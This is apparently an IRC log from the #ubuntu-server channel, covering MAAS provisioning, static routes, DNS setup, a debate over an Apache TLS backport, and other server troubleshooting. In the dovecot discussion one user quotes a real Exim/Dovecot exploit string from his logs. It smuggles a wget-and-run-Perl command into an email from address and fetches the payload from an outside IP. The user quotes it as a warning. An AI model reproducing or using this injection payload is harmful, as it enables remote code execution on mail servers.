<Lequtix> i'm sorry diegonat i've never setup the private cloud stuff
<sarig> i stick to openstack personaly buddy
<diegonat> I think it is something to do with the dns server but im not sure...
 * sarig suddenly interested in MAAS
 * sarig <-- research
<diegonat> sarig, thank u
<Lequtix> so maas takes care of all the sync?
<Lequtix> and the clustering?
<diegonat> it takes care of the provision of new machines
<Lequtix> this is one subject i haven't really explored
<sarig> yes
<sarig> all in one
<sarig> horizontal and vertical scaling
<sarig> just checking viable cross os support
 * sarig still loves razor and puppet
<Lequtix> so your problem is your instances don't show up in the control panel, but the node works fine?
<sarig> this though is a pure "ubunto" controlling stack
<Lequtix> yea when u install ubuntu server you have the option to install maas
<Lequtix> i've never tried it.. don't have 3 pc's
<Lequtix> diegonat.. did you set the fqdn's on the nodes and controller?  and add dns entries for them in either bind or in  /etc/hosts
<Lequtix> just so everything can find everything else
<diegonat> shouldnt maas take care of everything??
<Lequtix> well it would be good to double check
<Lequtix> ping the FQDN for each part of your network on all the pc's
<Lequtix> make sure they can all resolve each other
<Lequtix> go on machine a... ping machine b and c
<Lequtix> then ping machine c and a from machine b.  etc
<Lequtix> use FQDN
<diegonat> cannot ping any of them
<Lequtix> ok..  just make /etc/hosts entries for all machines
<Lequtix> on all machines
<Lequtix> see if that helps
<Lequtix> it will at least take DNS out of the equasion as a problem
<Lequtix> 192.168.1.10 machine1.domain.local machine1
<Lequtix> thats the format
<Lequtix> put fqdn first.. single name next
<Lequtix> once done.. reboot them all
<diegonat> ok im trying
<Lequtix> if it doesn't fix anything at least we've eliminated DNS as the problem
<ScottK> zul: Is there an FFe bug for percona-xtrabackup?
<zul> not that i know of
<ScottK> zul: If you want to add a new package post feature freeze, you need one.
<zul> even for universe?
<Hammerhead2011-S> Hi all, persistent routes are killing me in 13.04!
<Hammerhead2011-S> post-up /bin/route add -net 192.168.0.0/16 gw 192.168.253.2 dev eth1
<Hammerhead2011-S> looks good right?
<Hammerhead2011-S> I can not get it to stick. I CAN put it in after boot but, that sucks.
<Hammerhead2011-S> any help would be greatly appreciated.
<Lequtix> you have to put it in /etc/network/interfaces
<Lequtix> one sec
<Hammerhead2011-S> haha I know that :-)
<Hammerhead2011-S> That is a snip from the interfaces file
<Lequtix> i'm just looking for the syntax
<Lequtix> ipost-up /etc/network/scripts/iproute2
<Hammerhead2011-S> ipost?
<Lequtix> so at the end of your /etc/init/network/interfaces
<Lequtix> put post-up <command>
<Lequtix> sorry the i is not supposed to be in there
<Lequtix> so after all the networking is processed you can execute a command or script
<Lequtix> in your case, adding a static route
<Lequtix> do you have two gateways?
<Hammerhead2011-S> are you thinking about /etc/network/interfaces?
<Lequtix> yes
<Hammerhead2011-S> :-)
<Lequtix> the past line in /etc/network/interfaces should be post-up <command>
<Hammerhead2011-S> no just one gw. but multiple interfaces on different subnets
<ScottK> zul: Yes.
<Hammerhead2011-S> well one defgw....sorry
<Hammerhead2011-S> and that command that I posted is in the /etc/network/interfaces file
<Lequtix> up route add [-net|-host] <host/net>/<mask> gw <host/IP> dev <Interface>
<Lequtix> try that then
<Lequtix> drop the POST
<Lequtix> up route add -net 172.20.11.0/16 gw 172.20.10.254 dev eth1
<Lequtix> exmple
<diegonat> guys on MAAS i have machines' status on commissioning although they are up and running... any idea?
<zul> ScottK/smoser: https://bugs.launchpad.net/ubuntu/+bug/1221807
<uvirtbot> Launchpad bug 1221807 in ubuntu "FFE: percona-xtra-backup" [Undecided,New]
<ScottK> zul: Thanks.
<ScottK> Would someone from the server team express an opinion on Bug #1218817?
<uvirtbot> Launchpad bug 1218817 in xen "[FFE] Update to Xen-4.3 in Saucy" [High,New] https://launchpad.net/bugs/1218817
<Lequtix> hey hammerhead..  if you just have interfaces connected to subnets.. but there's nothing beyond that subnet..  you shouldn't need static routes
<Lequtix> if you do, then you need to use iproute2 and setup for multiple gateways..
<Lequtix> i have a howto somewhere
<Lequtix> http://kindlund.wordpress.com/2007/11/19/configuring-multiple-default-routes-in-linux/
<Hammerhead2011-S> There are multiple nets on the other side of these interfaces.
<Lequtix> ok check out that howto
<Lequtix> linux doesn't do multiple gateways out of the box
<Hammerhead2011-S> I wonder why I can add them on the commandline but not via the script
<Hammerhead2011-S> if I do a #> ip route add 192.168.0.0/16 via 192.168.253.2 dev eth1
<Hammerhead2011-S> everything works fine
<Hammerhead2011-S> Don't need multiple GW's just the ability to statically route traffic
<Lequtix> k.
<Hammerhead2011-S> weird....so weired.
<Lequtix> http://www.ubuntugeek.com/howto-add-permanent-static-routes-in-ubuntu.html
<Lequtix> this is where i got the info for u
<Lequtix> maybe you have a syntax error or something
<Lequtix> i know the ip statement has to be AFTER all the interfaces are up
<Lequtix> so put it at the bottom of the file
<zul> ScottK:  +1 from me it has arm support which is wanted by users
<ScottK> zul: Please say so in the bug.
<zul> adam_g: https://code.launchpad.net/~zulcss/python-swiftclient/1.6.0/+merge/184356
<nobodies> i installed ubuntu-desktop using apt and it installed loads of crap with it, is there any way of quickly removing it all? e.g. i now have 40 games 20 text editors etc.
<adam_g> zul, https://code.launchpad.net/~gandelman-a/ubuntu/saucy/horizon/openstack_auth_min/+merge/184360
<evermean> hi i am trying to install ubuntu 13.04 x64 via USB on a machine that has no CD-ROM ... but the installer keeps on trying to mount a cd-rom....any ideas?
<zul> adam_g:  can you have in the debian/changelog 2013.2~b3-0ubuntu1 please
<evermean> It keep on prompting:  The current screen is telling me: Your installation CD-ROM couldn't be mounted. This probably means that the CD-ROM was not in the drive. If so you can insert it and try again
<adam_g> zul, shall i just go ahead an release it?
<zul> adam_g:  b3? sure that will help alot
<adam_g> zul, id actually like to do some testing to make sure the b3 dashboard is functional out of hte box
<zul> adam_g: https://code.launchpad.net/~zulcss/python-keystoneclient/0.3.2/+merge/184361
<adam_g> k
<zul> adam_g: https://code.launchpad.net/~zulcss/python-heatclient/0.2.4/+merge/184363
<nobodies> nobody knows the answer to my question?
<jkitchen> nobodies: if you apt-get uninstall ubuntu-desktop it'll tell you there's a bunch of other stuff installed that is no longer needed and tell you how to remove ti
<nobodies> jkitchen, it didnt, however i have just found an apt-get remove that someone has written on the forum which contains all the applications it installs
<zul> adam_g: https://code.launchpad.net/~zulcss/python-glanceclient/0.11.0/+merge/184370
<zul> adam_g: https://code.launchpad.net/~zulcss/python-neutronclient/2.3.0/+merge/184376
<tom[]> where should i set env vars for a service?
<ikonia> in the init script ?
<ikonia> depends
<ikonia> could be in the service config file
<tom[]> for example, mariadb and UMASK_DIR
<tom[]> i don't want to modify /etc/init.d/mysql, it's like forking
<tom[]> i mean, forking in the source control sense
<tom[]> and i don't know a mysql-specific config file for env vars
<tom[]> i imagined there would a an ubuntu or debian convention for this
<adam_g> zul, https://bugs.launchpad.net/ubuntu/+source/horizon/+bug/1221906
<uvirtbot> Launchpad bug 1221906 in horizon "Havana-3 Dependency missing: python-troveclient" [Critical,New]
<zul> adam_g: *grumble*
<adam_g> zul, packaged: lp:~ubuntu-server-dev/python-troveclient/havana
<adam_g> zul, ceilometer is busted: https://bugs.launchpad.net/ubuntu/+source/ceilometer/+bug/1221956
<uvirtbot> Launchpad bug 1221956 in ceilometer "ceilometer 2013.2~b2-0ubuntu4 is uninstallable" [Undecided,New]
#ubuntu-server 2013-09-07
<mgw> I'm trying to debug a weird dns issueâ¦ I have a .internal zone, which delegates .A.internal to another dns server
<mgw> When I do a dig of foo.A.internal @ns.internal, it works â sometimes
<mgw> But more often, ns.internal never sees the response from ns.A.internal â even though I can see the response in a tcpdump running on ns.internal
<mgw> By "not see", I mean it does not show in bind's debug log
<mgw> any ideas?
<Quest>  i need to scan the system (from out side) to see if it has any vulnarebilities for an attack. then understand how to fix them.
<Quest> nessus and metasploit, so they dont need to be installed ON the system that is TO BE Scanned?    I wonder how will the vulnerbilitites could be check from out side? only open ports can be checked. like nmap does.  can you elaborate?
<nobodies> i have an old ubuntu distro "natty" how can i do an dist upgrade
<nobodies> e.g. do-release-upgrade is not installed and i cant apt get it because the repo dosnt exist anymore
<Patrickdk_> sure it exists
<Patrickdk_> change to the archive repo's
<nobodies> how?
<tedski> nobodies: see here: http://old-releases.ubuntu.com/releases/11.04/
<tedski> nobodies: edit your sources.list to include the relevant repos from here: http://old-releases.ubuntu.com/ubuntu/dists/
<nobodies> great thanks i've done that now :)
<Quest> http://masoodahmad.com/02.Session-Hijacking-Pt.2.mov how the hell can the email / password be visible in this middleman attack when the user was using HTTPS gmail website ?
<qman__> Quest, it's a bit off topic, but that's a simple man in the middle
<qman__> he clicked past the certificate warning
<Quest> qman__,  sorry?  "past the certificate warning?"
<qman__> Quest, when he browsed to gmail, he was presented with a certificate warning because his traffic was being intercepted
<qman__> he clicked ok to continue anyway without a single word spoken on it
<qman__> it's disingenuous, as is using windows 2000 and horribly outdated versions of internet explorer
<Quest> what was the warning about?
<qman__> the certificate name not matching, because it was invalid and presented by the attacker rather than gmail
<qman__> but again, this is offtopic, it has nothing to do with ubuntu server or even linux in general
<Quest> i think with https, the data , should have gone out of the computer after it has been encrypted. so once it goes out. how can it be seen in a text file by middle man . in plain text.
<Quest> qman__,  oh. the cert was invalid?  he never setup the certificate...... did he in the video?
<qman__> the man in the middle intercepts and modifies the transmission, the client never reaches gmail to initiate a secure connection
<Quest> qman__,  the client does reaches gmail, how come he would load the login web page else then?
<qman__> you clearly do not understand the basics of how https and SSL work
<bekks> And it has nothing to do with ubuntu - it is a generic issue.
<Quest> qman__,  can we private chat. (away from ubuntu and bekks )
<qman__> no, you need to learn a lot more before you can understand how this attack works
<qman__> take a course or read a good book on PKI
<Quest> qman__,  only think i guess is that. the client did reached gmail. but the certificate was supplied by cain. as its default behaviour?
<Quest> qman__,  it was a course video. iam doing what you said. but i neeed discussions. with you skills. can we chat else where?
<Quest> am i correct about the cain and cert ? qman__
<bekks> No.
<Quest> bekks,  dont respond. its ubuntu channel
<Quest> qman__,  so?
<bekks> Quest: If you dont like the answer, dont ask.
<Quest> not asking you )
<Quest> :)
<bekks> Ignoring you. Good luck.
<qman__> no, you do not understand how it works
<Quest> bekks,  atlast. thanks
<qman__> stop pestering me, and learn how PKI functions
<qman__> I have already explained how it works
<Quest> hm.. i thought i knew https and read docs
<Quest> last question. qman__   is cain or abel sending its own certificate to client?
<Quest> y/n?
<LargePrime> hey all.  my /tmp is full?
<LargePrime>  http://paste.ubuntu.com/6076170/
<bekks> LargePrime: Thats not a standard ubuntu filesystem. What did you do?
<bekks> LargePrime: Please provide the output of "lsb_release -a"
<bekks> LargePrime: In a pastebin please.
<qman__> LargePrime, http://stackoverflow.com/questions/17536139/releasing-unneccesary-space-used-in-tmp
<qman__> the second answer, in particular
<LargePrime> bekks: "No LSB modules are available."
<Quest> last question. qman__   is cain or abel sending its own certificate to client?
<bekks> LargePrime: The entire output. Not just one line.
<bekks> LargePrime: So where is the entire output? :)
<LargePrime> http://paste.ubuntu.com/6076180/
<bekks> LargePrime: And pastebin your /etc/fstab too, please, along with "uname -a"
<LargePrime> qman__:   /tmp: device is busy. when i try and unmount
<LargePrime> bekks: http://paste.ubuntu.com/6076217/ is uname -a  .  I dont understand "pastebin your /etc/fstab"
<bekks> LargePrime: Copy the content of /etc/fstab into a pastebin.
<bekks> You are running a pretty old kernel, on your 12.04.3
<LargePrime> `i should update it?
<bekks> The current kernel for 12.04.3 is 3.5.0
<bekks> Yes, you should.
<LargePrime> right now i cant update anything, cause /tmp issue
<LargePrime> bekks:  fstab http://paste.ubuntu.com/6076226/
<bekks> So you did mount your /tmp on your own, dont you?
<LargePrime> nope
<LargePrime> it happened cause / was full
<bekks> It didnt. /tmp did not mount because / is full. And your / has 6.1GB free space.
<LargePrime> my / WAS full
<LargePrime> as qman__  link points out
<LargePrime> ubuntu mounts /tmp in ram
<LargePrime> when that happens
<LargePrime> but i am not sure how to unmount it
<LargePrime> and unmount says it is in use
<LargePrime> http://paste.ubuntu.com/6076245/ is what i get when i try an unmount
<bekks> Then you have to reboot.
<LargePrime> poop
<LargePrime> so reboot then unmount it
<LargePrime> ?
<bekks> No.
<bekks> Reboot unmounts everything, and reboots your computer.
<LargePrime> is there any other option to rebooting?
<Pastafarian> Anyone Ubuntu staffers online?
<Pastafarian> The lack of an apache 2.4 port is getting more and more worrying.
<Pastafarian> When is a 2.4 port to 12.04 lts and others planned?
<Pastafarian> https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/1197884
<uvirtbot> Launchpad bug 1197884 in apache2 "apache2.2 SSL has no forward-secrecy: need ECDHE keys" [Wishlist,Fix committed]
<Pastafarian> This needs to be sorted right now.
<LargePrime> Pastafarian:
<LargePrime> My imaginary friend still loves you.
<Pastafarian> FSM ?
<Pastafarian> This bug is not "wishlist"
<Pastafarian> https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/1197884
<uvirtbot> Launchpad bug 1197884 in apache2 "apache2.2 SSL has no forward-secrecy: need ECDHE keys" [Wishlist,Fix committed]
<Pastafarian> It's security critical. RC4 is being implied as being cracked by the NSA etc...  meaning we could do with the newer ciphers.
<mdeslaur> Pastafarian: Bruce Schneier said "Prefer conventional discrete-log-based systems over elliptic-curve systems; the latter have constants that the NSA influences when they can"
<mdeslaur> Pastafarian: if someone backports the ECDHE stuff to apache 2.2, we may consider adding it
<ScottK> OTOH, some of the black hat (or defcon, I can't recall) presentations this year gave me the impression that RSA/DSA's days are numbered.
<mdeslaur> ScottK: that turned out to be overly exaggerated
<ScottK> Interesting.
<mdeslaur> see https://www.schneier.com/blog/archives/2013/08/the_cryptopocal.html
<mdeslaur> the fact that ECC is patented doesn't help the situation at all
<mdeslaur> unless everyone starts giving royalties to Blackberry
<ScottK> Agreed.
<mdeslaur> It's been a pretty depressing few months :P
<ScottK> Thanks.
<Pastafarian> That being said
<Pastafarian> we need it updating in one of the two ways
<Pastafarian> asap
<Pastafarian> The major hint is that RSA is over
<Pastafarian> and that RC4 can be broken.
<Pastafarian> mdeslaur, if ubuntu is meant to have a server version which they're selling support to shouldnt the devs give more of a crap about this
<mdeslaur> Pastafarian: yes, ubuntu devs should definitely be looking at that
<Pastafarian> ultimately someone needs to get elgamal going
<mdeslaur> Pastafarian: someone needs to backport the support to apache 2.2
<Pastafarian> that should have been done certainly
<Pastafarian> however it's not like they shouldnt drop 2.4 into raring and earlier
<Pastafarian> especially lts
<mdeslaur> releases rarely get newer versions, especially for something like this
<mdeslaur> this is far from a critical issue
<Pastafarian> Where as I would disagree ;)
<Pastafarian> RC4 is flogging a dead horse.
<mdeslaur> I don't see any other distros rushing out to do the backporting work, or to release apache 2.4 into older releases
<Pastafarian> The alternatives are locked into 2.2.22
<Pastafarian> however debian has it in testing
<Pastafarian> and has for a long while
<mdeslaur> Pastafarian: saucy will have 2.4
<Pastafarian> I know, and I still don't want to wait until October
<Pastafarian> and I cannot jerk around on production machines compiling it instead
<mdeslaur> Pastafarian: you're not in the US, are you?
<Pastafarian> Nope.
<Pastafarian> So I have slightly less to be concerned about, regardless. It's committed. Just needs speeding the hell up.
<mdeslaur> committed?
<Pastafarian> Fix committed, i,e, in saucy
<Pastafarian> I'd expect it to be shoved in 12.04 quickly too.
<mdeslaur> that's likely not going to happen
<Pastafarian> Then someone needs to pull a cranium out of somewhere.
<Pastafarian> >LTS when we feel like it.
<mdeslaur> Pastafarian: your definition of what an LTS is is flawed
<Pastafarian> In which case by 5 years of support they mean, at our discretion regardless of security?
<mdeslaur> Pastafarian: that's not a security issue
<Pastafarian> Not for the Operating System
<Pastafarian> For anyone using it
<Pastafarian> If the ubuntu devs are making their definitions strictly to the security of a SERVER operating system only to the OS
<Pastafarian> they're being at best, stupid.
<ScottK> So you want the stability of an LTS on a system that's updated all the time?
<ScottK> Pick one.
<Pastafarian> ScottK, don't be dense.
<Pastafarian> You want stability and security.
<Pastafarian> These are not mutually exclusive
<ScottK> No, but dumping a new version of apache into an already release LTS is insanity.
<Pastafarian> and when tested has it presented issues?
<Pastafarian> have someone even tried?
<Pastafarian> plenty of PPAs out there
<Pastafarian> why is it insanity? I can choose 2.2 or 2.4 in windows
<Pastafarian> or debian
<Pastafarian> and expect on many other distros
#ubuntu-server 2013-09-08
<brad9001> hello all, I just set up dovecot and I wanted to see what email client you guys would recommend because I dont like thunderbird
<Pastafarian> matter of personal taste.
<Pastafarian> I've only used outlook and thunderbird. I stick to the latter.
<brad9001> well I can never get thunderbird to work and it pisses me off because i love it for my gmail accounts
<brad9001> Ill look into outlook though
<Pastafarian> in terms of more than a email client outlook is fantastic
<Pastafarian> but it's more suited to business work, meetings, calendar etc...
<Pastafarian> works fine as an email client
<brad9001> oh, well what would you reccomend besides thunderbird?
<Pastafarian> besides outlook, no idea
<Pastafarian> never used anything
<Pastafarian> you might want to look into mailpile if you are interested in encryption
<brad9001> ok will do thanks @pastafarian
<brad9001> @pastafarian you there? would you mind helping me with dovecot-postfix setup?
<Pastafarian> Sorry, I haven't done dovecot before.
<Pastafarian> There are a few good guides knocking around on the ubuntu wiki somewhere.
<ScottK> The configuration in Ubuntu Server Guide (see /topic) works.
<Pastafarian> I am not entirely sure that the implementation there is secure
<Pastafarian> There was a recent dovecot exploit that worked and there was no imput sanitisation on dovecot when it got stuff passed from postfix
<Pastafarian> they could run arbitrary commands by embeding them into the headers of the email
<ScottK> Link?
<Pastafarian> reply to address I seem to remember
<Pastafarian> one second, it might not apply here, I need to find the link
<Pastafarian> I saw them try to do it on my mail server, but I am not using dovecot
<Pastafarian> the offending string itself was the from address
<Pastafarian> from=<x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}188.130.34.244/p``perl${IFS}/tmp/p.pl`@blaat.co$
<ScottK> Interesting.
<ScottK> I don't think there's anything in the way one configures dovecot that would affect if it did input validation on the From address or not.
<Pastafarian> I remember the link saying it was the return path
<Pastafarian> that something when passed executed this
<Pastafarian> It might have been an EXIM dovecot config however
<Pastafarian> trying to find the original email as that is from my emails to the relevant abuse@ addresses
<Pastafarian> ScottK, https://isc.sans.edu/diary/Dovecot++Exim+Exploit+Detects/16243
<ScottK> Thanks.
<ScottK> Shouldn't be a problem with postfix/lmtp.
<Pastafarian> indeed
<Pastafarian> Rusty memory
<Pastafarian> that being said, they imply the default config for exim and dovecot is the cause
<Pastafarian> which is worrying
<Pastafarian> I reported that to 3 different businesses and got no replies from any of them.
<Pastafarian> all of them directly responsible for providing this hacker with services
<ScottK> I wonder if it had a CVE.
<Pastafarian> I don't think it did at the time but I cannot be sure about that
<Pastafarian> either way the logs are misleading
<Pastafarian> the email contained no From:
<Pastafarian> only the reply-to:
<Pastafarian> the headers themselves on that mail gave it away
<Pastafarian> ScottK, server guide doesnt cover courier which is surprising
<LargePrime> how tangential a discussion are we allowed hear?
<LargePrime> like i hear ovh is out of servers
<Pastafarian> is that even possible?
<LargePrime> and am looking for mor info
<Pastafarian> They're a hosting company
<Pastafarian> they'd just buy more servers
<LargePrime> It seems they have no servers?
<Pastafarian> seems unlikely
<LargePrime> intell stopped making the CPU they use
<Pastafarian> they'd just tide over using EC2 or something
<Pastafarian> LargePrime, that isn't going to stop them.
<LargePrime> well the sp packages are now at 72 hours till available
<Pastafarian> They'll just use a different CPU
<LargePrime> but i hear that after you order they are taking weeks to fill
<Pastafarian> seems unlikely for such a large company to have screwed it up that badly
<LargePrime> but all this is hearsay
<LargePrime> thats why i bug people like yous
<LargePrime> But the SP1's used to fill in 20 min flat
<LargePrime> and the web site now say 72 hours
<LargePrime> and there are a few web acounts of others not getting servers for weeks
<Pastafarian> well, it's not impossible for it to happen
<Pastafarian> but it's like hearing that amazon ec2 ran out of servers
<LargePrime> http://forum.ovh.co.uk/showthread.php?t=7176
<Pastafarian> ha
<Pastafarian> every time I look at VPS's I cringe
<Pastafarian> so expensive
<Pastafarian> I have a geolocated octacore with 16gb of RAM for free
<Pastafarian> if I wanted something similar from a VPS host I am looking at 10k annually
<Pastafarian> Gotta love universities eh?
<Fire> Anyone can give me a hand with bind9 config im having issues with.
<Fire> Im probably just forgetting something really stupid.
<Fire> Anyone can give me a hand with bind9 issue - using Dig it resolves but when pointed to webserver it doesnt
<ikonia> when pointed at a webserver ?
<Fire> As in i pointed my domain name to my server with NS records; but it wotn resolve
<ikonia> you just said it resolved with dig
<Fire> when I ssh internally it resolves
<ikonia> Fire: is this domain name on the public internet
<Fire> yes
<ikonia> what is the domain name
<Fire> moddl.com
<ikonia> Name Server: KS200136.KIMSUFI.COM
<ikonia> Name Server: NS.KIMSUFI.COM
<ikonia> Name Server: NS11.OVH.NET
<ikonia> are they your name servers ?
<Fire> thats correct
<ikonia> Fire: what is the FQDN you are trying to resolve
<Fire> *.moddl.com.
<ikonia> can you give me a valid host
<ikonia> eg: test01.moddl.com
<ikonia> when did you update these records ?
<Fire> few hours ago - was trying to get just moddl.com. to work first then ill fiddle with subdomains
<ikonia> ok, so it's probably not propogated yet
<ikonia> as my dns server is showing no records
<Fire> never had the issue before
<ikonia> I can't get a response from ns.kimsufi.com
<sgran> Fire: when I ask your nameservers directly, none of them respond with an soa record
<Fire> hmm
<Fire> its first time ive tried to setup dns on a kimsufi/ovh
<ikonia> Fire: it's showing they are not soa
<ikonia> and I can't do recursion, so it rejects me
<sgran> ns.kimsufi.com and ns11.ovh.net give me 'recursion requested but not available' and ks200136.kimsufi.com does not answer
<ikonia> sgran: confirmed
<sgran> I'd suggest that you have not configured them to be authoritative for the domain?
<ikonia> seems the logical conclusion
<Fire> let me check
<Fire> am pretty sure i did
<Fire> 38200755
<Fire> moddl.com.      IN      SOA     ns1.moddl.com. admin.moddl.com. (
<Fire> any other ideas
<Fire> Im thinking about just changing the records at the registrar
<Fire> sgran any other ideas
<sgran> Fire: the .com registrar says that moddl.com is served by kimsufi/ovh
<Fire> It is
<sgran> I think the simplest is going to be letting kisufi/ovh know about this
<Fire> Kimsufi support are beyond useless
<sgran> hmm.  This begs the question - why are you using them? :)
<Fire> Cheap :)
<Fire> Ridicuolously so in fact
<sgran> I might be seeing why
<Fire> I used 2 kimsufis in the past as seedboxes - if you are peering mostly to europe / canada its crazy good value
<sgran> in fact, I'm going to set up a new business
<sgran> pay me Â£5/year, and I'll pretend to host DNS for you
<sgran> of course, I won't actually do anything but collect your money
<sgran> but it will be cheap :)
<Fire> To put it in perspective i transferred ~25TB in a month.
<Fire> which for Â£6.30 for 2 servers is quite good value
<Fire> For my business i use elsewhere - but I dont really wanna spend Â£60/month for a personal server for tinkering
<Nox_404> Hi, i made a mistake, on an ubuntu server 12.04 i create a bridge between eth0 and another bridge (i wrote the wrong iface) so now i can't reconnect this server ! (using ssh). If i reboot the server will my connection be back ?
<Nox_404> please answer me
<bekks> Nox_404: Do you have any other chance other than rebooting now?
<Nox_404> bekks: thats a remote server and i don't have any other way to connect this server
<bekks> Then you have no other option left.
<bekks> So it doesnt matter what we tell you, you have to reboot.
<Nox_404> bekks: ok so i'll try that
<Nox_404> bekks: thanks
<bekks> Thank yourself ;)
<patdk-lap> how would we know if a reboot would help?
<patdk-lap> you lacked to tell us how to did it, what files you modified.
<bekks> There is no other chance than rebooting.
<Nox_404> patdk-lap: I used `brctl addif iface iface`
<bekks> Nox_404: So did you reboot it?
<Nox_404> bekks: I have to wait for a friend to reboot it, like i said i don't have access to this server
<Nox_404> bekks: I must wait for tonight ....
<bekks> Nox_404: Does your friend have physical access?
<Nox_404> bekks: yes
<bekks> So there even is a way to fix it if rebooting doesnt help.
<bekks> You should have told us about those details.
<Nox_404> bekks: but he doesn't know anything about ubuntu..
<bekks> You can tell him what he needs to do.
<bekks> You can screw his server, you can tell him to reboot it - so you can tell him what to do. :)
<Nox_404> i just wanted to know if rebooting is enouth to fix it
<bekks> we dont know.
<plasmen> hello
<plasmen> can you help me with something
<plasmen> I am missing the 250-AUTH LOGIN PLAIN and 250-AUTH=LOGIN PLAIN
<plasmen> any ideas?
<Nox_404> bekks: My friend reboot it and it works fine, brctl doesn't keep the configuration after a reboot
#ubuntu-server 2014-09-01
<blkperl> so I'm running samba on Ubuntu Trusty and file creation / deletion works, but copying from windows does not, any ideas?
<dustinspringman> what up fishes
<dustinspringman> blkperl: are you able to connect from the windows machine to the SMB without issue?
<dustinspringman> blkperl: also, that creation/deletion.. is that from a windows machine that is connected via SMB?
<blkperl> dustinspringman: yes and yes
<blkperl> the error is "not enough space"
<blkperl> and there is plenty of space, so I'm assuming it getting confused because the fs is nfs
<dustinspringman> blkperl: sounds "quota" related.. like there is a quota being imposed accidentally or improperly
<blkperl> nope
<blkperl> it was working on Ubuntu Precise
<dustinspringman> blkperl: and you upgraded or fresh install?
<blkperl> fresh install
<dustinspringman> blkperl: Have you looked at the directory permissions? If you can create/delete but not modify (copy) then maybe that's the issue?
<blkperl> on unix the perms are fine
<dustinspringman> blkperl: I'm not sure what that means.. on unix the perms are fine?
<blkperl> sry, the perms look ok on the ubuntu server
<blkperl> s/perms/permissions
<dustinspringman> brb*
<dustinspringman> blkperl: are you able to copy via SMB from another *nix machine to the NFS?
<blkperl> I've filed a bug, https://bugs.launchpad.net/ubuntu/+source/samba/+bug/1363774
<uvirtbot> Launchpad bug 1363774 in samba "Samba fails to copy to shares with NFS filesystems " [Undecided,New]
<dustinspringman> blkperl: good to know, i'll keep my eyes out for that if I run into it.
<blkperl> yeah i can't seem to connect to it from linux
<lordievader> Good morning.
<hadifarn_> is there a script that adds a vhost on ubuntu for me?
<lordievader> hadifarn_: Why do you need a script for that, simply define one, enable it and reload apache.
<hadifarn_> lordievader: if you're doing it way too often, a script helps
<lordievader> Not if every config is completely different from the other.
<ikonia> hadifarn_: then write a script
<ikonia> hadifarn_: if it's the same - make a tamplte and write a script that does "cp template $1"
<hadifarn_> jee, thanks
<ikonia> "template" sorry
<hadifarn_> I get 500 error. in logs it says "configuration error:  couldn't perform authentication. AuthType not set!"
<hadifarn_> when I googled it, turns out I need to add allow all in httpd.conf
<hadifarn_> but my httpd.conf is empty!
<hadifarn_> or I don't know where it is
<pmorris> How can I load modules (from /etc/modules) before file systems are mounted?
<pmorris> On two of my 14.04 servers modules are loaded first but on the third they seem to occur the other way around and it causes problems because a module is needed to mount a filesystem
<pmorris> On the problem system I see `* Starting Mount filesystems on boot` as the very first entry in boot.log, before `* Starting load modules from /etc/modules`
<lordievader> pmorris: Put them into the initramfs.
<pmorris> lordievader: I tried that and it works but why, for two of my machines, is it adequate to simply modify /etc/modules but for this one I have to modify the initramfs?
<pmorris> They are all Ubuntu 14.04 server machines
<lordievader> pmorris: I've rarely done this on Ubuntu but I think you need /etc/initramfs-tools/modules and then update the actual initramfs with "sudo update-initramfs -u".
<pmorris> lordievader, again, I've tried that and it works
<pmorris> But I want to know why I have to do this for one out of three machines
<pmorris> And I want to not have to do it that way
<lordievader> pmorris: Err I cannot tell with the info you've given me. What module is required?
<pmorris> 'vboxsf'
<pmorris> It's a file system module so naturally it is required prior to mounting file systems
<lordievader> But that is used for shared folders right? Shouldn't stop a linux box from booting.
<lordievader> Or at least I don't  suppose there are system files in the shared dirs.
<pmorris> I added an entry in fstab to mount it there
<pmorris> At the time fstab is read it has not been loaded one the problem system
<pmorris> Because /etc/modules is read after mounting the file systems
<pmorris> BRB
<Vladimir> What's the best way to debug a tftp server ?
<ikonia> Vladimir: I told you earlier - get it working using the loop back interface so you know there is no networking involved, then move forward from there
<Vladimir> well I tried to send from the same machine and it worked
<Vladimir> it updated the file date
<ikonia> so you know your tftp server is working file
<ikonia> so then - job done, your tftp server is working
<Vladimir> yeah but still I can't send files from other devices to it
<ikonia> you don't have a problem with your tftp server
<ikonia> thats not the tftp server
<ikonia> you've just proved it worked
<ikonia> so the problem is not with your tftp server
<Vladimir> I guess =)
<lordievader> Vladimir: Check your firewall, they allways like to mess with things.
<Vladimir> lordievader: Yeah, it's probably the firewall :/
<Vladimir> lordievader: yeah it's probably the firewall, I tested to send to another tftp server machine
<Vladimir> and got the same error message, thou with a small addition to the error message:  Error in sending rq message.  Exceeded 5 retransmits.
<ikonia> Vladimir: what firewall rules does hour machine have
<ikonia> does your machine have sorry
<Vladimir> ikonia: you mean that the linux machine may have firewall rules that's in the way of tftp ?
<ikonia> Vladimir: on the tftp server, what firewall rules are there
<Vladimir> i'm gonna take a look
<ikonia> so you've not even checked this yet ?
<ikonia> [I told you 2 days ago to verify the file wall, especially around udp
<ikonia> firewall
<Vladimir> I did check the firewall but not on the machine but on network
<ikonia> I told you 2 days ago to do this
<Vladimir> And I checked if the linux machine have blocked udp
<ikonia> Vladimir: I told you to check the rules especially around udp
<Vladimir> but I haven't checked any firewall rules on the linux machine
<ikonia> not if the machine blocked udp
<ikonia> and I told you to do this on the tftp server
<sphenxes> @search french revolution
<ikonia> sphenxes: it's not that sort of but
<ikonia> bot
<sphenxes> no
<ikonia> no ?
<jamespage> lynxman, you called?
<sarthor> Hi, Is there any free and open source hotel management system ?
<sarthor> Sorry, I was writing there in Linux chan.
<RoyK> sarthor: http://www.hoteldruid.com/ <-- first hit on google :P
<sarthor> RoyK: Checked that one, and have installed on my machine. but I am unable to understand that software.
<RoyK> ok
<zertyui> hi
<zertyui> how to connect to an server from existing key ?
<dustinspringman> zertyui: please explain..
<zertyui> i got an ssh public key
<dustinspringman> zertyui: for like an Amazon web services ubuntu server?
<zertyui> i don't know
<zertyui> i don't know
<zertyui> i got an ssh public key
<zertyui> i got an ssh private key also
<zertyui> i would like to connect to my server using that private key
<zertyui> how to do ?
<RoyK> zertyui: ssh-copy-id user@yourservershostname
<zertyui> no
<zertyui> u don't undersand
<zertyui> i got public and private ssh key on textpad
<zertyui> and the key has been deployed allready
<zertyui> with my user id
<zertyui> i simply would like to connect using that key from windows pageant
<iclebyte2> what is the best way to downgrade your php5-cgi on an ubuntu 14.04 setup?
<iclebyte2> we foolishly rebuilt a web server with 14.04 and it's now in production
